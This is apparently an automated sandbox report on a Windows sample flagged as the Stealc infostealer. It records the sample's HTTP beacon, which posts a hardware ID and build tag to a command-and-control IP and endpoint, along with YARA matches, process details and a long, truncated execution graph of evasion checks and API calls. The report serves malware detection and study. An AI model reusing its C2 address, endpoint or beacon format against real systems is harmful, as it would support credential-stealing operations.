                    Sep 25, 2024 20:42:23.954274893 CEST4973080192.168.2.4193.233.113.184
                    • 193.233.113.184
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449730193.233.113.184806036C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Sep 25, 2024 20:42:04.537493944 CEST90OUTGET / HTTP/1.1
                    Host: 193.233.113.184
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Sep 25, 2024 20:42:05.219647884 CEST203INHTTP/1.1 200 OK
                    Date: Wed, 25 Sep 2024 18:42:05 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Sep 25, 2024 20:42:05.660185099 CEST420OUTPOST /6d687e53250c2111.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA
                    Host: 193.233.113.184
                    Content-Length: 218
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 31 31 41 31 42 38 41 35 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 2d 2d 0d 0a
                    Data Ascii: ------GHDAKKJJJKJKECBGCGDAContent-Disposition: form-data; name="hwid"CF11A1B8A5973370857647------GHDAKKJJJKJKECBGCGDAContent-Disposition: form-data; name="build"LogsDiller1------GHDAKKJJJKJKECBGCGDA--
                    Sep 25, 2024 20:42:05.878762007 CEST210INHTTP/1.1 200 OK
                    Date: Wed, 25 Sep 2024 18:42:05 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:14:42:02
                    Start date:25/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x400000
                    File size:418'816 bytes
                    MD5 hash:DF5444313433CC5C1126D41F68D71903
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1892368314.000000000251E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1710064685.0000000004150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    Target ID:3
                    Start time:14:42:05
                    Start date:25/09/2024
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1052
                    Imagebase:0x9f0000
                    File size:483'680 bytes
                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:7.9%
                      Dynamic/Decrypted Code Coverage:6.8%
                      Signature Coverage:11.8%
                      Total number of Nodes:1525
                      Total number of Limit Nodes:33
                      execution_graph 27628 409440 strlen malloc strcpy_s free std::exception::exception 27697 41115b3 18 API calls ctype 27699 41ce48 LeaveCriticalSection __initptd 27630 41b050 6 API calls 3 library calls 27601 4100005 27606 410092b GetPEB 27601->27606 27603 4100030 27607 410003c 27603->27607 27606->27603 27608 4100049 27607->27608 27622 4100e0f SetErrorMode SetErrorMode 27608->27622 27613 4100265 27614 41002ce VirtualProtect 27613->27614 27616 410030b 27614->27616 27615 4100439 VirtualFree 27620 41005f4 LoadLibraryA 27615->27620 27621 41004be 27615->27621 27616->27615 27617 41004e3 LoadLibraryA 27617->27621 27619 41008c7 27620->27619 27621->27617 27621->27620 27623 4100223 27622->27623 27624 4100d90 27623->27624 27625 4100dad 27624->27625 27626 4100dbb GetPEB 27625->27626 27627 4100238 VirtualAlloc 27625->27627 27626->27627 27627->27613 27670 411d106 41 API calls __amsg_exit 27702 4116a0a ExitProcess 27737 406f60 memcpy 27631 41dc60 atexit 27632 4111c35 110 API calls 27738 410765 279 API calls 27704 417667 lstrcpy 27739 4109b37 7 API calls 27705 41b270 5 API calls 2 library calls 27674 4111525 strtok_s strtok_s ctype 27741 410932a ??2@YAPAXI RaiseException allocator 27638 4116c57 688 API calls 27639 411102b strtok_s lstrlen lstrcpy 27677 4116d18 642 API calls 27640 41bc11 71 API calls 2 library calls 27707 4116a40 6 API calls 27708 4113b7d 91 API calls 2 library calls 27709 411cd97 170 API calls 2 library calls 27710 411be78 162 API calls 2 library calls 27644 41ac2c 71 API calls ctype 27680 410fd67 152 API calls 27711 411ae93 43 API calls ctype 27646 4090c3 5 API calls allocator 27712 4110297 149 API calls 27648 4113823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27747 41abd0 free std::exception::_Tidy ctype 27683 411118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27748 413916 91 API calls 2 library calls 27749 4183dc 15 API calls 27684 411cd8f 6 API calls 2 library calls 27650 411102b StrCmpCA strtok_s 27651 41104b7 88 API calls 27652 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27653 4110cb6 30 API calls 27717 41ceea SetUnhandledExceptionFilter 27718 4106ebc VirtualProtect 26045 4169f0 26088 402260 26045->26088 26062 417850 3 API calls 26063 416a30 26062->26063 26064 4178e0 3 API calls 26063->26064 26065 416a43 26064->26065 26221 41a9b0 26065->26221 26067 416a64 26068 41a9b0 4 API calls 26067->26068 26069 416a6b 26068->26069 26070 41a9b0 4 API calls 26069->26070 26071 416a72 26070->26071 26072 41a9b0 4 API calls 26071->26072 26073 416a79 26072->26073 26074 41a9b0 4 API calls 26073->26074 26075 416a80 26074->26075 26229 41a8a0 26075->26229 26077 416b0c 26233 416920 GetSystemTime 26077->26233 26079 416a89 26079->26077 26081 416ac2 OpenEventA 26079->26081 26083 416af5 CloseHandle Sleep 26081->26083 26084 416ad9 26081->26084 26085 416b0a 26083->26085 26087 416ae1 CreateEventA 26084->26087 26085->26079 26086 416b16 CloseHandle ExitProcess 26087->26077 26430 4045c0 17 API calls 26088->26430 26090 402274 26091 4045c0 34 API calls 26090->26091 26092 40228d 26091->26092 26093 4045c0 34 API calls 26092->26093 26094 4022a6 26093->26094 26095 4045c0 34 API calls 26094->26095 26096 4022bf 26095->26096 26097 4045c0 34 API calls 26096->26097 26098 4022d8 26097->26098 26099 4045c0 34 API calls 26098->26099 26100 4022f1 26099->26100 26101 4045c0 34 API calls 26100->26101 26102 40230a 26101->26102 26103 4045c0 34 API calls 26102->26103 26104 402323 26103->26104 26105 4045c0 34 API calls 26104->26105 26106 40233c 26105->26106 26107 4045c0 34 API calls 26106->26107 26108 402355 26107->26108 26109 4045c0 34 API calls 26108->26109 26110 40236e 26109->26110 26111 4045c0 34 API calls 26110->26111 26112 402387 26111->26112 26113 4045c0 34 API calls 26112->26113 26114 4023a0 26113->26114 26115 4045c0 34 API calls 26114->26115 26116 4023b9 26115->26116 26117 4045c0 34 API calls 26116->26117 26118 4023d2 26117->26118 26119 4045c0 34 API calls 26118->26119 26120 4023eb 26119->26120 26121 4045c0 34 API calls 26120->26121 26122 402404 26121->26122 26123 4045c0 34 API calls 26122->26123 26124 40241d 26123->26124 26125 4045c0 34 API calls 26124->26125 26126 402436 26125->26126 26127 4045c0 34 API calls 26126->26127 26128 40244f 26127->26128 26129 4045c0 34 API calls 26128->26129 26130 402468 26129->26130 26131 4045c0 34 API calls 26130->26131 26132 402481 26131->26132 26133 4045c0 34 API calls 26132->26133 26134 40249a 26133->26134 26135 4045c0 34 API calls 26134->26135 26136 4024b3 26135->26136 26137 4045c0 34 API calls 26136->26137 26138 4024cc 26137->26138 26139 4045c0 34 API calls 26138->26139 26140 4024e5 26139->26140 26141 4045c0 34 API calls 26140->26141 26142 4024fe 26141->26142 26143 4045c0 34 API calls 26142->26143 26144 402517 26143->26144 26145 4045c0 34 API calls 26144->26145 26146 402530 26145->26146 26147 4045c0 34 API calls 26146->26147 26148 402549 26147->26148 26149 4045c0 34 API calls 26148->26149 26150 402562 26149->26150 26151 4045c0 34 API calls 26150->26151 26152 40257b 26151->26152 26153 4045c0 34 API calls 26152->26153 26154 402594 26153->26154 26155 4045c0 34 API calls 26154->26155 26156 4025ad 26155->26156 26157 4045c0 34 API calls 26156->26157 26158 4025c6 26157->26158 26159 4045c0 34 API calls 26158->26159 26160 4025df 26159->26160 26161 4045c0 34 API calls 26160->26161 26162 4025f8 26161->26162 26163 4045c0 34 API calls 26162->26163 26164 402611 26163->26164 26165 4045c0 34 API calls 26164->26165 26166 40262a 26165->26166 26167 4045c0 34 API calls 26166->26167 26168 402643 26167->26168 26169 4045c0 34 API calls 26168->26169 26170 40265c 26169->26170 26171 4045c0 34 API calls 26170->26171 26172 402675 26171->26172 26173 4045c0 34 API calls 26172->26173 26174 40268e 26173->26174 26175 419860 26174->26175 26434 419750 GetPEB 26175->26434 26177 419868 26178 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26177->26178 26181 41987a 26177->26181 26179 419af4 GetProcAddress 26178->26179 26180 419b0d 26178->26180 26179->26180 26183 419b46 26180->26183 26184 419b16 GetProcAddress GetProcAddress 26180->26184 26182 41988c 21 API calls 26181->26182 26182->26178 26185 419b68 26183->26185 26186 419b4f GetProcAddress 26183->26186 26184->26183 26187 419b71 GetProcAddress 26185->26187 26188 419b89 26185->26188 26186->26185 26187->26188 26189 416a00 26188->26189 26190 419b92 GetProcAddress GetProcAddress 26188->26190 26191 41a740 26189->26191 26190->26189 26192 41a750 26191->26192 26193 416a0d 26192->26193 26194 41a77e lstrcpy 26192->26194 26195 4011d0 26193->26195 26194->26193 26196 4011e8 26195->26196 26197 401217 26196->26197 26198 40120f ExitProcess 26196->26198 26199 401160 GetSystemInfo 26197->26199 26200 401184 26199->26200 26201 40117c ExitProcess 26199->26201 26202 401110 GetCurrentProcess VirtualAllocExNuma 26200->26202 26203 401141 ExitProcess 26202->26203 26204 401149 26202->26204 26435 4010a0 VirtualAlloc 26204->26435 26207 401220 26439 4189b0 26207->26439 26210 401249 __aulldiv 26211 40129a 26210->26211 26212 401292 ExitProcess 26210->26212 26213 416770 GetUserDefaultLangID 26211->26213 26214 4167d3 GetUserDefaultLCID 26213->26214 26215 416792 26213->26215 26214->26062 26215->26214 26216 4167c1 ExitProcess 26215->26216 26217 4167a3 ExitProcess 26215->26217 26218 4167b7 ExitProcess 26215->26218 26219 4167cb ExitProcess 26215->26219 26220 4167ad ExitProcess 26215->26220 26441 41a710 26221->26441 26223 41a9c1 lstrlenA 26225 41a9e0 26223->26225 26224 41aa18 26442 41a7a0 26224->26442 26225->26224 26227 41a9fa lstrcpy lstrcatA 26225->26227 26227->26224 26228 41aa24 26228->26067 26230 41a8bb 26229->26230 26231 41a90b 26230->26231 26232 41a8f9 lstrcpy 26230->26232 26231->26079 26232->26231 26446 416820 26233->26446 26235 41698e 26236 416998 sscanf 26235->26236 26475 41a800 26236->26475 26238 4169aa SystemTimeToFileTime SystemTimeToFileTime 26239 4169e0 26238->26239 26240 4169ce 26238->26240 26242 415b10 26239->26242 26240->26239 26241 4169d8 ExitProcess 26240->26241 26243 415b1d 26242->26243 26244 41a740 lstrcpy 26243->26244 26245 415b2e 26244->26245 26477 41a820 lstrlenA 26245->26477 26248 41a820 2 API calls 26249 415b64 26248->26249 26250 41a820 2 API calls 26249->26250 26251 415b74 26250->26251 26481 416430 26251->26481 26254 41a820 2 API calls 26255 415b93 26254->26255 26256 41a820 2 API calls 26255->26256 26257 415ba0 26256->26257 26258 41a820 2 API calls 26257->26258 26259 415bad 26258->26259 26260 41a820 2 API calls 26259->26260 26261 415bf9 26260->26261 26490 4026a0 26261->26490 26269 415cc3 26270 416430 lstrcpy 26269->26270 26271 415cd5 26270->26271 26272 41a7a0 lstrcpy 26271->26272 26273 415cf2 26272->26273 26274 41a9b0 4 API calls 26273->26274 26275 415d0a 26274->26275 26276 41a8a0 lstrcpy 26275->26276 26277 415d16 26276->26277 26278 41a9b0 4 API calls 26277->26278 26279 415d3a 26278->26279 26280 41a8a0 lstrcpy 26279->26280 26281 415d46 26280->26281 26282 41a9b0 4 API calls 26281->26282 26283 415d6a 26282->26283 26284 41a8a0 lstrcpy 26283->26284 26285 415d76 26284->26285 26286 41a740 lstrcpy 26285->26286 26287 415d9e 26286->26287 27216 417500 GetWindowsDirectoryA 26287->27216 26290 41a7a0 lstrcpy 26291 415db8 26290->26291 27226 404880 26291->27226 26293 415dbe 27371 4117a0 26293->27371 26295 415dc6 26296 41a740 lstrcpy 26295->26296 26297 415de9 26296->26297 26298 401590 lstrcpy 26297->26298 26299 415dfd 26298->26299 27448 405960 39 API calls ctype 26299->27448 26301 415e03 27391 411050 strtok_s strtok_s lstrlenA lstrcpy 26301->27391 26303 415e0e 26304 41a740 lstrcpy 26303->26304 26305 415e32 26304->26305 26306 401590 lstrcpy 26305->26306 26307 415e46 26306->26307 27449 405960 39 API calls ctype 26307->27449 26309 415e4c 27392 410d90 7 API calls 26309->27392 26311 415e57 26312 41a740 lstrcpy 26311->26312 26313 415e79 26312->26313 26314 401590 lstrcpy 26313->26314 26315 415e8d 26314->26315 27450 405960 39 API calls ctype 26315->27450 26317 415e93 27393 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26317->27393 26319 415e9e 26320 401590 lstrcpy 26319->26320 26321 415eb5 26320->26321 27394 411a10 121 API calls 26321->27394 26323 415eba 26324 41a740 lstrcpy 26323->26324 26325 415ed6 26324->26325 27451 404fb0 8 API calls 26325->27451 26327 415edb 26328 401590 lstrcpy 26327->26328 26329 415f5b 26328->26329 27395 410740 26329->27395 26331 415f60 26332 41a740 lstrcpy 26331->26332 26333 415f86 26332->26333 26334 401590 lstrcpy 26333->26334 26335 415f9a 26334->26335 27452 405960 39 API calls ctype 26335->27452 26337 415fa0 27453 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26337->27453 26339 415fab 26340 401590 lstrcpy 26339->26340 26341 415feb 26340->26341 27454 401e80 67 API calls 26341->27454 26343 415ff0 26344 416000 26343->26344 26345 416092 26343->26345 26347 41a740 lstrcpy 26344->26347 26346 41a7a0 lstrcpy 26345->26346 26348 4160a5 26346->26348 26349 416020 26347->26349 26350 401590 lstrcpy 26348->26350 26351 401590 lstrcpy 26349->26351 26352 4160b9 26350->26352 26353 416034 26351->26353 27458 405960 39 API calls ctype 26352->27458 27455 405960 39 API calls ctype 26353->27455 26356 4160bf 27459 413560 36 API calls 26356->27459 26357 41603a 27456 4112d0 21 API calls ctype 26357->27456 26360 41608a 26363 41610b 26360->26363 26366 401590 lstrcpy 26360->26366 26361 416045 26362 401590 lstrcpy 26361->26362 26364 416085 26362->26364 26365 416130 26363->26365 26368 401590 lstrcpy 26363->26368 27457 413dc0 75 API calls 26364->27457 26369 416155 26365->26369 26372 401590 lstrcpy 26365->26372 26370 4160e7 26366->26370 26371 41612b 26368->26371 26374 41617a 26369->26374 26375 401590 lstrcpy 26369->26375 27460 4140b0 64 API calls ctype 26370->27460 27462 414780 116 API calls ctype 26371->27462 26378 416150 26372->26378 26376 41619f 26374->26376 26381 401590 lstrcpy 26374->26381 26380 416175 26375->26380 26382 4161c4 26376->26382 26388 401590 lstrcpy 26376->26388 27463 414bb0 67 API calls ctype 26378->27463 26379 4160ec 26384 401590 lstrcpy 26379->26384 27464 414d70 75 API calls 26380->27464 26387 41619a 26381->26387 26385 4161e9 26382->26385 26391 401590 lstrcpy 26382->26391 26389 416106 26384->26389 26392 416210 26385->26392 26396 401590 lstrcpy 26385->26396 27465 414f40 69 API calls ctype 26387->27465 26394 4161bf 26388->26394 27461 415100 71 API calls 26389->27461 26395 4161e4 26391->26395 26397 416220 26392->26397 26398 4162b3 26392->26398 27466 407710 125 API calls ctype 26394->27466 27467 415050 67 API calls ctype 26395->27467 26401 416209 26396->26401 26403 41a740 lstrcpy 26397->26403 26402 41a7a0 lstrcpy 26398->26402 27468 419010 54 API calls ctype 26401->27468 26405 4162c6 26402->26405 26406 416241 26403->26406 26408 401590 lstrcpy 26405->26408 26407 401590 lstrcpy 26406->26407 26409 416255 26407->26409 26410 4162da 26408->26410 27469 405960 39 API calls ctype 26409->27469 27472 405960 39 API calls ctype 26410->27472 26413 4162e0 27473 413560 36 API calls 26413->27473 26414 41625b 27470 4112d0 21 API calls ctype 26414->27470 26417 4162ab 26420 41a7a0 lstrcpy 26417->26420 26418 416266 26419 401590 lstrcpy 26418->26419 26421 4162a6 26419->26421 26422 4162fc 26420->26422 27471 413dc0 75 API calls 26421->27471 26424 401590 lstrcpy 26422->26424 26425 416310 26424->26425 27474 405960 39 API calls ctype 26425->27474 26427 41631c 26429 416338 26427->26429 27475 416630 9 API calls ctype 26427->27475 26429->26086 26431 404697 26430->26431 26432 4046ac 11 API calls 26431->26432 26433 40474f 6 API calls 26431->26433 26432->26431 26433->26090 26434->26177 26436 4010c2 ctype 26435->26436 26437 4010fd 26436->26437 26438 4010e2 VirtualFree 26436->26438 26437->26207 26438->26437 26440 401233 GlobalMemoryStatusEx 26439->26440 26440->26210 26441->26223 26443 41a7c2 26442->26443 26444 41a7ec 26443->26444 26445 41a7da lstrcpy 26443->26445 26444->26228 26445->26444 26447 41a740 lstrcpy 26446->26447 26448 416833 26447->26448 26449 41a9b0 4 API calls 26448->26449 26450 416845 26449->26450 26451 41a8a0 lstrcpy 26450->26451 26452 41684e 26451->26452 26453 41a9b0 4 API calls 26452->26453 26454 416867 26453->26454 26455 41a8a0 lstrcpy 26454->26455 26456 416870 26455->26456 26457 41a9b0 4 API calls 26456->26457 26458 41688a 26457->26458 26459 41a8a0 lstrcpy 26458->26459 26460 416893 26459->26460 26461 41a9b0 4 API calls 26460->26461 26462 4168ac 26461->26462 26463 41a8a0 lstrcpy 26462->26463 26464 4168b5 26463->26464 26465 41a9b0 4 API calls 26464->26465 26466 4168cf 26465->26466 26467 41a8a0 lstrcpy 26466->26467 26468 4168d8 26467->26468 26469 41a9b0 4 API calls 26468->26469 26470 4168f3 26469->26470 26471 41a8a0 lstrcpy 26470->26471 26472 4168fc 26471->26472 26473 41a7a0 lstrcpy 26472->26473 26474 416910 26473->26474 26474->26235 26476 41a812 26475->26476 26476->26238 26478 41a83f 26477->26478 26479 415b54 26478->26479 26480 41a87b lstrcpy 26478->26480 26479->26248 26480->26479 26482 41a8a0 lstrcpy 26481->26482 26483 416443 26482->26483 26484 41a8a0 lstrcpy 26483->26484 26485 416455 26484->26485 26486 41a8a0 lstrcpy 26485->26486 26487 416467 26486->26487 26488 41a8a0 lstrcpy 26487->26488 26489 415b86 26488->26489 26489->26254 26491 4045c0 34 API calls 26490->26491 26492 4026b4 26491->26492 26493 4045c0 34 API calls 26492->26493 26494 4026d7 26493->26494 26495 4045c0 34 API calls 26494->26495 26496 4026f0 26495->26496 26497 4045c0 34 API calls 26496->26497 26498 402709 26497->26498 26499 4045c0 34 API calls 26498->26499 26500 402736 26499->26500 26501 4045c0 34 API calls 26500->26501 26502 40274f 26501->26502 26503 4045c0 34 API calls 26502->26503 26504 402768 26503->26504 26505 4045c0 34 API calls 26504->26505 26506 402795 26505->26506 26507 4045c0 34 API calls 26506->26507 26508 4027ae 26507->26508 26509 4045c0 34 API calls 26508->26509 26510 4027c7 26509->26510 26511 4045c0 34 API calls 26510->26511 26512 4027e0 26511->26512 26513 4045c0 34 API calls 26512->26513 26514 4027f9 26513->26514 26515 4045c0 34 API calls 26514->26515 26516 402812 26515->26516 26517 4045c0 34 API calls 26516->26517 26518 40282b 26517->26518 26519 4045c0 34 API calls 26518->26519 26520 402844 26519->26520 26521 4045c0 34 API calls 26520->26521 26522 40285d 26521->26522 26523 4045c0 34 API calls 26522->26523 26524 402876 26523->26524 26525 4045c0 34 API calls 26524->26525 26526 40288f 26525->26526 26527 4045c0 34 API calls 26526->26527 26528 4028a8 26527->26528 26529 4045c0 34 API calls 26528->26529 26530 4028c1 26529->26530 26531 4045c0 34 API calls 26530->26531 26532 4028da 26531->26532 26533 4045c0 34 API calls 26532->26533 26534 4028f3 26533->26534 26535 4045c0 34 API calls 26534->26535 26536 40290c 26535->26536 26537 4045c0 34 API calls 26536->26537 26538 402925 26537->26538 26539 4045c0 34 API calls 26538->26539 26540 40293e 26539->26540 26541 4045c0 34 API calls 26540->26541 26542 402957 26541->26542 26543 4045c0 34 API calls 26542->26543 26544 402970 26543->26544 26545 4045c0 34 API calls 26544->26545 26546 402989 26545->26546 26547 4045c0 34 API calls 26546->26547 26548 4029a2 26547->26548 26549 4045c0 34 API calls 26548->26549 26550 4029bb 26549->26550 26551 4045c0 34 API calls 26550->26551 26552 4029d4 26551->26552 26553 4045c0 34 API calls 26552->26553 26554 4029ed 26553->26554 26555 4045c0 34 API calls 26554->26555 26556 402a06 26555->26556 26557 4045c0 34 API calls 26556->26557 26558 402a1f 26557->26558 26559 4045c0 34 API calls 26558->26559 26560 402a38 26559->26560 26561 4045c0 34 API calls 26560->26561 26562 402a51 26561->26562 26563 4045c0 34 API calls 26562->26563 26564 402a6a 26563->26564 26565 4045c0 34 API calls 26564->26565 26566 402a83 26565->26566 26567 4045c0 34 API calls 26566->26567 26568 402a9c 26567->26568 26569 4045c0 34 API calls 26568->26569 26570 402ab5 26569->26570 26571 4045c0 34 API calls 26570->26571 26572 402ace 26571->26572 26573 4045c0 34 API calls 26572->26573 26574 402ae7 26573->26574 26575 4045c0 34 API calls 26574->26575 26576 402b00 26575->26576 26577 4045c0 34 API calls 26576->26577 26578 402b19 26577->26578 26579 4045c0 34 API calls 26578->26579 26580 402b32 26579->26580 26581 4045c0 34 API calls 26580->26581 26582 402b4b 26581->26582 26583 4045c0 34 API calls 26582->26583 26584 402b64 26583->26584 26585 4045c0 34 API calls 26584->26585 26586 402b7d 26585->26586 26587 4045c0 34 API calls 26586->26587 26588 402b96 26587->26588 26589 4045c0 34 API calls 26588->26589 26590 402baf 26589->26590 26591 4045c0 34 API calls 26590->26591 26592 402bc8 26591->26592 26593 4045c0 34 API calls 26592->26593 26594 402be1 26593->26594 26595 4045c0 34 API calls 26594->26595 26596 402bfa 26595->26596 26597 4045c0 34 API calls 26596->26597 26598 402c13 26597->26598 26599 4045c0 34 API calls 26598->26599 26600 402c2c 26599->26600 26601 4045c0 34 API calls 26600->26601 26602 402c45 26601->26602 26603 4045c0 34 API calls 26602->26603 26604 402c5e 26603->26604 26605 4045c0 34 API calls 26604->26605 26606 402c77 26605->26606 26607 4045c0 34 API calls 26606->26607 26608 402c90 26607->26608 26609 4045c0 34 API calls 26608->26609 26610 402ca9 26609->26610 26611 4045c0 34 API calls 26610->26611 26612 402cc2 26611->26612 26613 4045c0 34 API calls 26612->26613 26614 402cdb 26613->26614 26615 4045c0 34 API calls 26614->26615 26616 402cf4 26615->26616 26617 4045c0 34 API calls 26616->26617 26618 402d0d 26617->26618 26619 4045c0 34 API calls 26618->26619 26620 402d26 26619->26620 26621 4045c0 34 API calls 26620->26621 26622 402d3f 26621->26622 26623 4045c0 34 API calls 26622->26623 26624 402d58 26623->26624 26625 4045c0 34 API calls 26624->26625 26626 402d71 26625->26626 26627 4045c0 34 API calls 26626->26627 26628 402d8a 26627->26628 26629 4045c0 34 API calls 26628->26629 26630 402da3 26629->26630 26631 4045c0 34 API calls 26630->26631 26632 402dbc 26631->26632 26633 4045c0 34 API calls 26632->26633 26634 402dd5 26633->26634 26635 4045c0 34 API calls 26634->26635 26636 402dee 26635->26636 26637 4045c0 34 API calls 26636->26637 26638 402e07 26637->26638 26639 4045c0 34 API calls 26638->26639 26640 402e20 26639->26640 26641 4045c0 34 API calls 26640->26641 26642 402e39 26641->26642 26643 4045c0 34 API calls 26642->26643 26644 402e52 26643->26644 26645 4045c0 34 API calls 26644->26645 26646 402e6b 26645->26646 26647 4045c0 34 API calls 26646->26647 26648 402e84 26647->26648 26649 4045c0 34 API calls 26648->26649 26650 402e9d 26649->26650 26651 4045c0 34 API calls 26650->26651 26652 402eb6 26651->26652 26653 4045c0 34 API calls 26652->26653 26654 402ecf 26653->26654 26655 4045c0 34 API calls 26654->26655 26656 402ee8 26655->26656 26657 4045c0 34 API calls 26656->26657 26658 402f01 26657->26658 26659 4045c0 34 API calls 26658->26659 26660 402f1a 26659->26660 26661 4045c0 34 API calls 26660->26661 26662 402f33 26661->26662 26663 4045c0 34 API calls 26662->26663 26664 402f4c 26663->26664 26665 4045c0 34 API calls 26664->26665 26666 402f65 26665->26666 26667 4045c0 34 API calls 26666->26667 26668 402f7e 26667->26668 26669 4045c0 34 API calls 26668->26669 26670 402f97 26669->26670 26671 4045c0 34 API calls 26670->26671 26672 402fb0 26671->26672 26673 4045c0 34 API calls 26672->26673 26674 402fc9 26673->26674 26675 4045c0 34 API calls 26674->26675 26676 402fe2 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 402ffb 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 403014 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 40302d 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 403046 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 40305f 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 403078 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 403091 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 4030aa 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 4030c3 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 4030dc 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 4030f5 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 40310e 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 403127 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 403140 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 403159 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 403172 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 40318b 26709->26710 26711 4045c0 34 API calls 26710->26711 26712 4031a4 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 4031bd 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 4031d6 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 4031ef 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 403208 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 403221 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 40323a 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 403253 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 40326c 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 403285 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 40329e 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 4032b7 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 4032d0 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 4032e9 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 403302 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 40331b 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 403334 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 40334d 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 403366 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 40337f 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 403398 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 4033b1 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 4033ca 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 4033e3 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 4033fc 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 403415 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 40342e 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 403447 